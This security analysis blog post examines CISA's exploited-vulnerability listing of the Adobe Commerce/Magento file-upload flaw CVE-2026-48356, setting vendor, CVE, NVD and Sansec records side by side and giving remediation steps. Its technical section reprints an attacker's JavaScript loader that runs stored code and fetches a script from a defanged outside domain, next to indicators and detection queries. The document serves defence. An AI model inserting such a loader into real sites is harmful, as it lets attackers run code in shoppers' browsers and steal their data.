P.K. SHARMA

Cyber security intelligence, AI governance, practitioner analysis

CISA lists Adobe Commerce and Magento CVE-2026-48356 as exploited, 105 days after Adobe's July patch

CISA added CVE-2026-48356 to its exploited list on 27 October 2026, 105 days (derived) after Adobe's bulletin APSB26-73. Adobe's page still says it knows of no exploits, the entry names no source, and the attack reports come from one security vendor, Sansec.

By Parminder Kumar Sharma · · 20 min read

105 days from Adobe's fix to CISA's list, and what that does not show

The US Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalogue, version 2026.10.27, released at 19:00:02 UTC on Tuesday 27 October 2026, lists CVE-2026-48356 in Adobe Commerce and Magento. Adobe published the fix for that CVE in security bulletin APSB26-73 on 14 July 2026. That is 105 days from fix to listing (derived). The entry's due date is 10 November 2026, 14 days after it was added (derived).

What that does not establish. The entry does not say who exploited the flaw, against whom, how often, or since when. Its ransomware field reads "Unknown". Adobe's bulletin, last updated on 11 August 2026 and read again on 27 October, still says Adobe "is not aware of any exploits in the wild" for the issues it addresses. The only exploitation reports this briefing read in full come from Sansec, a Dutch ecommerce security firm that sells a web application firewall and a store scanner, and CISA's own data for the CVE cites two Sansec pages. Sansec dates the first attacks to 19 March 2026. That is 222 days (derived) before the listing, and it rests on Sansec alone.

This briefing reads the primary records: the KEV feed, the CVE record and the National Vulnerability Database (NVD) record, Adobe's bulletin page, CISA's Binding Operational Directive (BOD) 26-04 and its implementation guidance, and three research pages by Sansec. Everything was read between 21:31 and 21:44 GMT on 27 October 2026, hours after the listing, and either record could change. Day counts are this site's arithmetic and are labelled derived. Two checks come from this site's earlier work. The briefing on Adobe's 13 October bulletins never mentions this id, because it belongs to the July bulletin, so this is not a new patch. And the briefing on a KEV entry that described the wrong flaw is why section 3 compares the entry with the CVE record. This entry names the right class of flaw, with a caveat on its impact wording.

The KEV entry, field by field, and what it leaves out

The table sets what the KEV entry prints against what it does not. "Not stated" means not found in the entry as fetched from CISA's JSON feed. It does not mean the information does not exist. CISA's interest is to move agencies and the public to act, and the KEV is a list of vulnerabilities it has evidence were exploited. The evidence itself is not published in the entry.

What the KEV entry for CVE-2026-48356 prints and what it does not. Read from CISA's KEV JSON feed, catalogue 2026.10.27, on 27 October 2026.

QuestionPrinted in the entryNot stated
What is the flaw?Name: "Adobe Commerce and Magento Unrestricted Upload of File with Dangerous Type Vulnerability". Weakness: CWE-434. Vendor and product: Adobe, Commerce and Magento.Which of the four products in the CVE record is meant. The record also covers Adobe Commerce B2B and Adobe Commerce Events.
What does it do?"arbitrary code execution in the context of the current user", potentially gaining elevated access or control over the victim's account or session.Whether the code runs on the server or in a visitor's browser. The CVE text beside it adds that a victim must interact with a crafted URL or page.
Who exploited it?Nothing. The ransomware field reads "Unknown".The actor, the victims, the number of instances, the first date of exploitation, any indicators of compromise.
What is the evidence?The Notes field links Adobe's bulletin APSB26-73, the two BOD 26-04 pages and the NVD page.Any reporter or report. CISA's separate data in the CVE record cites two Sansec pages.
When must it be fixed?Added 2026-10-27, due 2026-11-10. Required action: apply mitigations per vendor instructions, or discontinue use if mitigations are unavailable.Which patch line to install. The entry points to Adobe's bulletin for that. Forensic triage field: "No".

Does the entry describe the right flaw? The brief 106 check

In brief 106 the KEV name and description described a different class of flaw from the CWE and from the pages the entry linked. Here the name, the CWE and the bulletin agree on the class: unrestricted upload of a file with a dangerous type, CWE-434. The wording about impact is where the records part company. The table sets five sources side by side.

What five sources print about CVE-2026-48356. KEV feed, CVE record (from CVE.org's services API), NVD record, Adobe bulletin APSB26-73 (expanded details) and Sansec's PolyShell advisory, all read on 27 October 2026.

SourceImpact and attack as printedScore and vector as printed
KEV entryCode execution "in the context of the current user", control of "the victim's account or session". No attack conditions.None. CWE-434.
CVE record, Adobe as the assignerSame sentence, then: "a victim must visit a maliciously crafted URL or interact with a compromised web page". Scope is changed.9.3 Critical. CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
NVD recordSame text. Status Modified. Both the NVD and Adobe's entry carry the same score. The KEV fields (cisaExploitAdd) were empty when read.9.3 Critical, same vector.
Adobe bulletin APSB26-73Category CWE-434. Impact: "Privilege escalation". Authentication required to exploit: "No". Severity Critical.9.6. CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L
Sansec advisory (secondary)A flaw in the REST API that "lets unauthenticated attackers upload executable files to any store". Code execution depends on how the web server is configured.None given.

Three differences matter. First, the user interaction wording. The CVE record and the KEV text describe an attack that needs a victim to click or visit something and that acts in the victim's context. Sansec describes unauthenticated uploads of executable files straight to the server. Both may be true of different consequences of one flaw, since Sansec itself separates stored cross site scripting from code execution by server configuration, but this briefing cannot tell from the records which behaviour CISA saw exploited. The entry does not say.

Second, the score. Adobe's own bulletin says 9.6 with a low availability impact (A:L). Adobe's CVE record and the NVD say 9.3 with none (A:N). This site recomputed both from the CVSS 3.1 formula: the vector with A:L gives 9.6 and the vector with A:N gives 9.3 (derived). Each number is right for its own vector, and the two differ in one metric. The bulletin was last updated on 11 August and the CVE record was last updated by Adobe on 27 August (derived from the record's dates), so the CVE record is the later of the two, but neither page says which score Adobe now stands behind.

Third, the versions. Adobe's bulletin lists 2.4.9 among the affected versions and gives 2.4.9-2026-jul as the fixed one. Sansec's advisory says Adobe released Magento 2.4.9 with the fix on 12 May and did not backport it. The article follows the vendor's page. The KEV product name also folds four products into one, "Commerce and Magento", and the CVE record lists Adobe Commerce, Adobe Commerce B2B, Magento Open Source and Adobe Commerce Events.

Who says it was exploited, and what they saw

CISA's entry stops at the listing. Its separate data in the CVE record, a CISA Coordinator record in the SSVC (Stakeholder Specific Vulnerability Categorization) format, timestamped 2026-10-27T19:53:15Z, reads: exploitation active, automatable no, technical impact total. That record's references are the KEV catalogue page and two Sansec pages. So the public evidence chain is: CISA says active, and points at Sansec.

Sansec's interest is plain: it sells Sansec Shield, a web application firewall, and eComscan, a store scanner, and each page recommends them. That does not make the findings wrong. It means the telemetry is one vendor's, from its own customers and crawler, and this briefing could not check it independently.

What each source says about exploitation, and how far it can be taken. Adobe's page, the CVE record and Sansec's pages, read on 27 October 2026.

ClaimWho says itWhat it does not establish
Exploitation is "active"CISA, in its CVE record data, at 19:53 UTC on 27 October.Who, where, how many, since when. The basis is not published.
First probing 16 March 2026, first attacks 19 March, mass scanning 23 MarchSansec's PolyShell advisory timeline.That the attacks used the exact behaviour CISA lists. The March pages predate the CVE id (reserved 21 May, published 14 July), and the id appears on the advisory only as later updated.
471 stores compromised in one hour on 30 MarchSansec's wave page, with a script injected from a freshly registered domain.How many of those stores ran Adobe Commerce rather than Magento Open Source, or which versions.
A loader campaign on 953 stores since July 2025, mostly MagentoSansec's 24 October page, on a fifth domain.That all 953 came through this flaw. Sansec says earlier waves "point to" file upload flaws and names this CVE and another, CVE-2025-54236.
A fully patched store got the loader on 23 OctoberSansec, for one store on 2.4.7-p10 with a rogue admin account found on 16 September.That the patch failed. A patch does not remove an account or a backdoor planted before it.
"Adobe is not aware of any exploits in the wild"Adobe's bulletin, last updated 11 August 2026.Anything about 27 October. It is older than the listing and the page had not changed when read.

One of Sansec's own figures is not consistent on its page. The advisory's opening says attacks were observed on 79.5% of "all stores", while the body says Sansec Shield blocked attempts against 79.5% of "all protected Magento stores". The second reading is the narrower one and the one this briefing would rely on, and it is a share of Sansec's customers, not of Magento stores worldwide.

A web search also found trade press coverage of PolyShell from March 2026. This briefing did not read those articles in full, did not check whether any of them holds evidence independent of Sansec, and does not cite them. Coverage from March also predates the CVE id, so it cannot settle whether the flaw CISA lists is the one reported.

The Adobe bulletin's acknowledgements list thanks researchers by CVE id. CVE-2026-48356 is not among the ids listed, and the bulletin never uses the name PolyShell. The CVE record marks the discovery source as external. Who reported the flaw to Adobe, and when, is not stated in anything read.

The clocks: 105 days from the fix, 222 from the first reported attack

Drawn from Adobe's bulletin APSB26-73, the CVE record, CISA's KEV entry and Sansec's pages, read 27 October 2026. Day counts are derived by this site. Cards 1 to 3 rest on Sansec alone.

Day counts for the dates in the figure. Every count is the calendar days between the two dates (derived).

FromToDays (derived)
Adobe bulletin APSB26-73 and CVE published, 14 July 2026KEV listing, 27 October 2026105
Sansec's first reported attack, 19 March 2026KEV listing, 27 October 2026222
Sansec's first reported attack, 19 March 2026Adobe bulletin, 14 July 2026117
Sansec says 2.4.9 carried a fix, 12 May 2026Adobe bulletin and backport, 14 July 202663
Bulletin last updated, 11 August 2026Read again, 27 October 202677
KEV listing, 27 October 2026Due date, 10 November 202614

Only the first row uses nothing but Adobe's and CISA's own records. The second and third rows use Sansec's date. None of the records says when CISA first knew, so the 105 days is the time to a listing, not the time anyone was exposed. If Sansec's account is right, a store that waited for Adobe's July bulletin had been under reported attack for 117 days (derived), and a store that waited for the listing for 222.

The 10 November deadline: who it binds, and the table behind it

BOD 26-04, issued on 10 June 2026, is "a compulsory direction to federal, executive branch, departments, and agencies", and unless a contract says otherwise it does not apply to contractors. So the 10 November date is a duty for US federal civilian agencies only. Every other organisation is free to treat it as a benchmark and is not bound by it.

The entry carries a due date of 14 days. The directive's Table 1, reproduced below as CISA published it, sets the clock from four facts: whether the asset is publicly exposed, whether the CVE is in the KEV, whether an adversary can automate the exploit, and the technical impact. CISA's data for this CVE is in the KEV, not automatable, total control. For a publicly exposed asset that reads as row 3: three days and a forensic triage. For an asset that is not publicly exposed it reads as row 11: 14 days. The entry's 10 November matches row 11.

The source's own table: CISA, BOD 26-04, Appendix A, Table 1, Remediation Timelines, read 27 October 2026. Rows 3 and 11 are the two that apply to a KEV entry that is not automatable and gives total control.
Drawn from the KEV entry, the CISA record in the CVE entry and BOD 26-04 Table 1 and its implementation guidance, read 27 October 2026. 30 October is three days after 27 October (derived).

So the 10 November date is the case where CISA has no evidence that a federal asset is exposed. CISA's guidance says it sets the KEV due date from the evidence it has of public exposure, and that "the final determination for asset exposure is determined by the agency". An internet facing Commerce storefront is the case row 3 describes, three days, which is 30 October (derived), with a forensic triage. The entry's own forensic triage field says "No". One more wrinkle: the directive's Phase III, "within 180 days of issuance", is where it asks agencies to meet Table 1, and 180 days from 10 June is 7 December 2026 (derived). This briefing does not settle from the text whether the three day row binds today. It does show that the one date in the entry is not the only one a federal operator of an exposed store has to ask about.

What the attack is, as Sansec describes it, and the labels that do a control's work

Sansec named this flaw PolyShell. It says Magento's REST API accepts a file upload as part of a cart item's custom options, writes it under pub/media/custom_options/quote/, and does not check the option id, the option type or the file extension. The only check, Sansec says, is an image header test that a polyglot file, one that is both a valid image and PHP, passes. The guest cart routes need no login. Whether an uploaded PHP file runs depends on the web server configuration, which varies by host. After code execution Sansec describes a backdoor called accesson.php sprayed across many folders, then a script injected into the store's CMS blocks that runs in shoppers' browsers. The figure follows Sansec's account. It has not been independently confirmed here.

Drawn from Sansec's PolyShell advisory (17 March 2026, with later updates) and its research page of 24 October 2026, read 27 October 2026. Sansec's account; not independently confirmed here.

A short check of the labels in play. Each looks like a control, and none is one.

Labels that stand in for a control in this story, and what the record shows.

LabelWhat it suggestsWhat the record shows
"Priority 2" and "not aware of any exploits"Routine urgency. Nothing is being attacked.The rating and the sentence date from 14 July and 11 August. CISA now lists active exploitation. This site's briefing on the October bulletins covers how Adobe's priorities are set.
"2.4.9"The newest release is the safe one.Adobe's bulletin lists 2.4.9 as affected. The fixed string is 2.4.9-2026-jul. A version number is not a patch level.
"Privilege escalation"A limited problem for people who already have an account.Adobe's own bulletin says authentication is not required. The CVE text says code execution. The label undersells the file upload.
"Patched"Clean.Sansec reports a store on 2.4.7-p10 that received the loader on 23 October after a rogue admin account and a backdoor were found in September. A patch closes a way in. It does not remove what is already planted.
"PolyShell"An official name.It is Sansec's name. Adobe's bulletin does not use it and credits no researcher for this CVE id.

Technical details

The primary records print version strings, scores and the entry's own fields. Sansec, the only source of attack detail, prints a detection query, two sets of find commands, web server rules, a list of backdoor paths and indicators. Everything below is copied from the saved pages, with live domains defanged by this site (hxxps and [.]). Neither Adobe nor CISA prints an indicator, a detection rule or a configuration. No exploit code is shown.

Adobe's affected and fixed strings, from the CVE record. They matter because a version label such as 2.4.9 appears in both lists: the first is affected, the second is the fixed patch line. A defender compares the patch level of every instance with these strings.

Text
Adobe Commerce
  affected, up to and including: 2.4.9, 2.4.8-p5, 2.4.7-p10, 2.4.6-p15, 2.4.5-p17, 2.4.4-p18
  fixed (unaffected): 2.4.9-2026-jul, 2.4.8-2026-jul, 2.4.7-2026-jul, 2.4.6-2026-jul, 2.4.5-2026-jul, 2.4.4-2026-jul
Adobe Commerce B2B
  affected, up to and including: 1.5.3, 1.5.2-p5, 1.4.2-p10, 1.3.4-p17, 1.3.3-p18
  fixed (unaffected): 1.5.3-2026-jul, 1.5.2-2026-jul, 1.4.2-2026-jul, 1.3.4-2026-jul, 1.3.3-2026-jul
Magento Open Source
  affected, up to and including: 2.4.9, 2.4.8-p5, 2.4.7-p10, 2.4.6-p15
  fixed (unaffected): 2.4.9-2026-jul, 2.4.8-2026-jul, 2.4.7-2026-jul, 2.4.6-2026-jul
Adobe Commerce Events
  affected, up to and including: 1.20.0
  fixed (unaffected): 1.21.0
Affected and fixed version strings for CVE-2026-48356, from the CVE record (CVE.org services API, assigner Adobe), read 27 October 2026. Layout by this site; strings as printed.

The KEV entry's own fields, one per line, with the long required action text left out (it is quoted in section 2). This is what an asset tool or an agency ingests.

Text
cveID: CVE-2026-48356
vendorProject: Adobe
product: Commerce and Magento
vulnerabilityName: Adobe Commerce and Magento Unrestricted Upload of File with Dangerous Type Vulnerability
dateAdded: 2026-10-27
dueDate: 2026-11-10
knownRansomwareCampaignUse: Unknown
forensicTriage: No
cwes: CWE-434
notes: https://www.adobe.com/trust/security/products/commerce/apsb26-73.html ; ; BOD 26-04: https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk ; Forensics Triage Requirements: https://www.cisa.gov/news-events/directives/bod-26-04-implementation-guidance-prioritizing-security-updates-based-risk ; https://nvd.nist.gov/vuln/detail/CVE-2026-48356
shortDescription: Adobe Commerce and Magento contain an unrestricted upload of file with dangerous type vulnerability that could result in arbitrary code execution in the context of the current user, potentially gaining elevated access or control over the victim's account or session.
Fields of the KEV entry for CVE-2026-48356, catalogue 2026.10.27, from CISA's KEV JSON feed, read 27 October 2026. One field per line by this site; values as printed.

Sansec's detection query for the CMS blocks, from its page of 24 October. It looks for the loader's key name and referrer parameter in the store's static blocks. Run the same query on the cms_page table, add a table prefix if the store uses one, and read update_time as the time of the attacker's most recent write. Sansec says deleting the script does not remove the attacker's access to the database.

sql
SELECT block_id, identifier, update_time FROM cms_block
WHERE content LIKE '%fpCode%' OR content LIKE '%se_referrer%'
   OR content LIKE '%localStorage.getItem%';
Detection query from Sansec, deepveindrilling.com: Magento CMS block loader hits 953 stores, 24 October 2026, read 27 October 2026.

Sansec's file system searches, from the same page. The first lists files in the two upload directories other than the access control file. The second finds copies of the backdoor. Any PHP, phtml or phar file in custom_options is a strong indicator, Sansec says.

bash
find pub/media/custom_options/ pub/media/customer_address/ -type f ! -name '.htaccess'
find . -name 'accesson.php' -type f
File system searches from Sansec's page of 24 October 2026, read 27 October 2026.

The paths where Sansec says accesson.php was found on a single compromised store (advisory of 17 March 2026). The pattern is an assets/images folder created inside each top level folder the attacker could write to, so a search by file name across the whole document root is the quickest check.

Text
var/assets/images/accesson.php
bamboo-specs/assets/images/accesson.php
lib/assets/images/accesson.php
app/assets/images/accesson.php
vendor/assets/images/accesson.php
pub/assets/images/accesson.php
bin/assets/images/accesson.php
setup/assets/images/accesson.php
generated/assets/images/accesson.php
phpserver/assets/images/accesson.php
Paths where accesson.php was found on one compromised store, from Sansec's PolyShell advisory of 17 March 2026 (page read 27 October 2026).

Web server rules from Sansec's advisory of 17 March 2026, written when it said no official patch existed for production versions. They limit what an uploaded file can do. Sansec says blocking web access to the upload directory does not prevent uploads: only a firewall rule that blocks the API call itself stops the attack. Apply the rules to the web server in front of the store, after the Nginx rule placement note below the block.

Text
location ~* ^/pub/media/custom_options/ {
    deny all;
    return 403;
}
Nginx rule from Sansec's PolyShell advisory (17 March 2026, read 27 October 2026). Sansec says to add it inside the server configuration before any location block that matches PHP files.
Text
<IfModule mod_php.c>
    php_flag engine 0
</IfModule>
Deny from all
Apache rule from the same Sansec advisory. Sansec says to check that pub/media/custom_options/.htaccess exists and contains it, and to rename the file if the server uses a non default AccessFileName.

The loader script as printed by Sansec on 24 October, with the domain defanged. Sansec explains that the first script reads a value named fpCode from the visitor's localStorage and runs it as an event handler, so a visitor who received a payload once runs it again on later page views even if the domain is offline. The second tag loads the loader from a domain. Search the CMS for these strings, and for the base64 encoded domains Sansec lists below.

html
<script>!function(){try{var c=localStorage.getItem("fpCode");if(c){var e=document.createElement("div");e.setAttribute("onclick",c);document.documentElement.appendChild(e);e.click();e.remove()}}catch(e){}}();</script>
<script src="hxxps://deepveindrilling[.]com/?s=d35c5031"></script>
The loader as printed by Sansec on 24 October 2026 (read 27 October 2026). Domain defanged by this site.

Indicators of compromise from the same page (24 October 2026), defanged by this site. The domains are Sansec's list for one operator's campaign, not a CISA list. The Keitaro URLs are a commercial ad tracker's traffic distribution endpoints that Sansec says the operator used before October. Treat any request from a store page to these hosts as a lead to investigate, not as proof of this CVE.

Text
Loader URL: hxxps://deepveindrilling[.]com/?s=d35c5031
Loader URL: hxxps://deepveindrilling[.]com/?s=49b7ca5f&fp=
Keitaro URL: hxxps://additionalver[.]com/Mb2z8J
Keitaro URL: hxxps://lanhd6549tdhse[.]top/KZtBscgb
Keitaro URL: hxxps://neswnsssn[.]click/PKgJDPfF
Keitaro URL: hxxps://manulfie[.]click/GKTD8cBz
Keitaro URL: hxxps://hdfdsi84j3h[.]top/sFnnPFHm
Keitaro URL: hxxps://c85grt98sd[.]com/1kYrdH
Payload URL: hxxps://leqdger[.]click/ssl/
Payload URL: hxxps://crypto-insider[.]top/ssl/
Keitaro decoy: QWE=123;
Base64 string: aHR0cHM6Ly9hZGRpdGlvbmFsdmVyLmNvbS9NYjJ6OEo/JnNlX3JlZmVycmVyPQ==
localStorage key: fpCode, 136c1e07507f4a97, 136c1e07507f4a98
Database location: cms_block.content
Indicators from Sansec's page of 24 October 2026 (read 27 October 2026), one per line by this site and defanged by this site. Sansec's list, not CISA's.

The Sansec advisory also names the two REST routes it calls the most dangerous and says GraphQL mutations use a different code path and are not vulnerable. A defender can look for POST and PUT requests to these routes in web server and WAF logs, and for unexpected files under pub/media/custom_options/quote/.

Text
POST /V1/guest-carts/:cartId/items
PUT  /V1/guest-carts/:cartId/items/:itemId
The two routes Sansec names as the most dangerous, from its PolyShell advisory (read 27 October 2026). Method and path as printed in its table.

Scores as printed. They differ in the availability metric, and the bulletin and the CVE record disagree (section 3).

Text
Adobe bulletin APSB26-73, CVE-2026-48356:
  CVSS base score: 9.6
  CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L
CVE record (assigner Adobe) and NVD:
  baseScore: 9.3
  vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
Scores and vectors as printed by Adobe's bulletin (page read 27 October 2026) and by the CVE record and NVD (read 27 October 2026).

What to do, in order

The order matters. Finding what you run comes first because every later step depends on it, and cleaning comes before relaxing because a patch does not remove what an attacker already planted.

Take this with you

Ranked actions for anyone who runs Adobe Commerce or Magento

  • Find every instance, including staging, development, agency run and hosted ones. List the product (Adobe Commerce, Adobe Commerce B2B, Magento Open Source, Adobe Commerce Events), the version and the patch level of each. Ask each host which patch line is installed.
  • Compare each patch level with Adobe's fixed strings for APSB26-73, such as 2.4.8-2026-jul or 2.4.7-2026-jul, and for Commerce Events 1.21.0. Treat a bare 2.4.9 as not fixed, as Adobe's bulletin lists it as affected.
  • Install the July patch line now if any instance is not on it. If a store cannot be patched today, put a firewall rule that blocks the vulnerable API call in front of it and deny web access to pub/media/custom_options. Sansec says only the first of those stops uploads.
  • Hunt for compromise even on patched stores. Query the cms_block and cms_page tables for the strings in the technical section, list files under pub/media/custom_options and pub/media/customer_address, search the document root for accesson.php, and review the admin user list for accounts nobody recognises.
  • If anything is found, treat it as an incident. Preserve evidence first, then remove the planted script and the access it came from, and change the database, admin and API integration passwords, as Sansec advises. Deleting a script alone leaves the way in.
  • Review which third party scripts and domains your store pages load. Add a content security policy report or monitor so a new script host in a store page is seen on the day it appears.
  • US federal civilian agencies: decide the public exposure of each instance, and check with your agency's BOD 26-04 contact whether an internet facing store falls in the three day row with forensic triage (Table 1, row 3) rather than the entry's 10 November, which matches the not exposed row.
  • Everyone else: the 10 November date does not bind you. Use the 105 days between fix and listing as a measure of your own lag, and record how long each patch took to reach each store.

The question this leaves

Adobe's bulletin was last updated 77 days before the listing and was still saying it knew of no exploits on the evening of the listing. Sansec says the attacks began 222 days before it. Whichever date is right, the exposing question is the same for the person who runs the store: if a script that nobody on your team wrote were sitting in your store's CMS blocks tonight, which log or query would show you, and since when?

Key facts

Sources

  1. PrimaryKEV JSON feed, catalogue 2026.10.27 released 2026-10-27T19:00:02Z, 1,760 entries: the CVE-2026-48356 entry with every field, and the other entry added the same day. Read with an honest user agent after reading robots.txtCISAaccessed 2026-10-27
  2. PrimaryCVE record for CVE-2026-48356: Adobe as assigner, published 2026-07-14, descriptions, CVSS 3.1 9.3, affected and fixed strings, and the CISA ADP record with SSVC exploitation active and two Sansec references, updated 2026-10-27T19:59ZCVE Program (MITRE CVE services)accessed 2026-10-27
  3. PrimaryNVD record for CVE-2026-48356: status Modified, last modified 2026-10-27T20:17Z, the 9.3 scores from NVD and Adobe, the SSVC data and the configuration listNIST National Vulnerability Databaseaccessed 2026-10-27
  4. PrimaryAdobe Security Bulletin APSB26-73, priority 2, published 14 July 2026, last updated 11 August 2026: affected and fixed versions, the not aware of any exploits statement, and the expanded vulnerability details for CVE-2026-48356 (9.6, A:L, authentication not required). Read in a browser tab after the host answered curl with 403Adobeaccessed 2026-10-27
  5. PrimaryBOD 26-04, issued 10 June 2026: scope, required actions, phases and Table 1 remediation timelinesCISAaccessed 2026-10-27
  6. PrimaryBOD 26-04 implementation guidance: the due date FAQ, publicly exposed, forensic triage steps and the KEV notes fieldCISAaccessed 2026-10-27
  7. Reported byPolyShell advisory, published 17 March 2026 and updated since: the flaw as Sansec describes it, routes, payload types, accesson.php paths, web server rules, the timeline to 14 July, and the CVE id. Vendor research; Sansec sells a WAF and a scannerSansecaccessed 2026-10-27
  8. Reported byMass PolyShell attack wave hits 471 stores in one hour, 30 March 2026: the script injected into CMS pages and blocks, the attack chain and indicators. Vendor researchSansecaccessed 2026-10-27
  9. Reported bydeepveindrilling.com: Magento CMS block loader hits 953 stores, 24 October 2026: the loader, the detection query, the indicators, the campaign counts and the 2.4.7-p10 store. Vendor researchSansecaccessed 2026-10-27
  10. Reported byThis site's briefing on Adobe's 13 October bulletins, linked to show this CVE id belongs to the July bulletin and for how Adobe's priority ratings are setpk-sharma.comaccessed 2026-10-27
  11. Reported byThis site's briefing on a KEV entry whose name and description described the wrong flaw, linked for the check made in section 3pk-sharma.comaccessed 2026-10-27

Share this briefing

Know someone who owns this problem? Send it to them.

Related briefings

The briefing, in your inbox

Practitioner analysis of cyber and AI security news. No vendor noise.

How often

Every new briefing in one email, at 7am, or at 7am, 12:30pm and 6pm. Nothing is sent when nothing is new. Unsubscribe any time.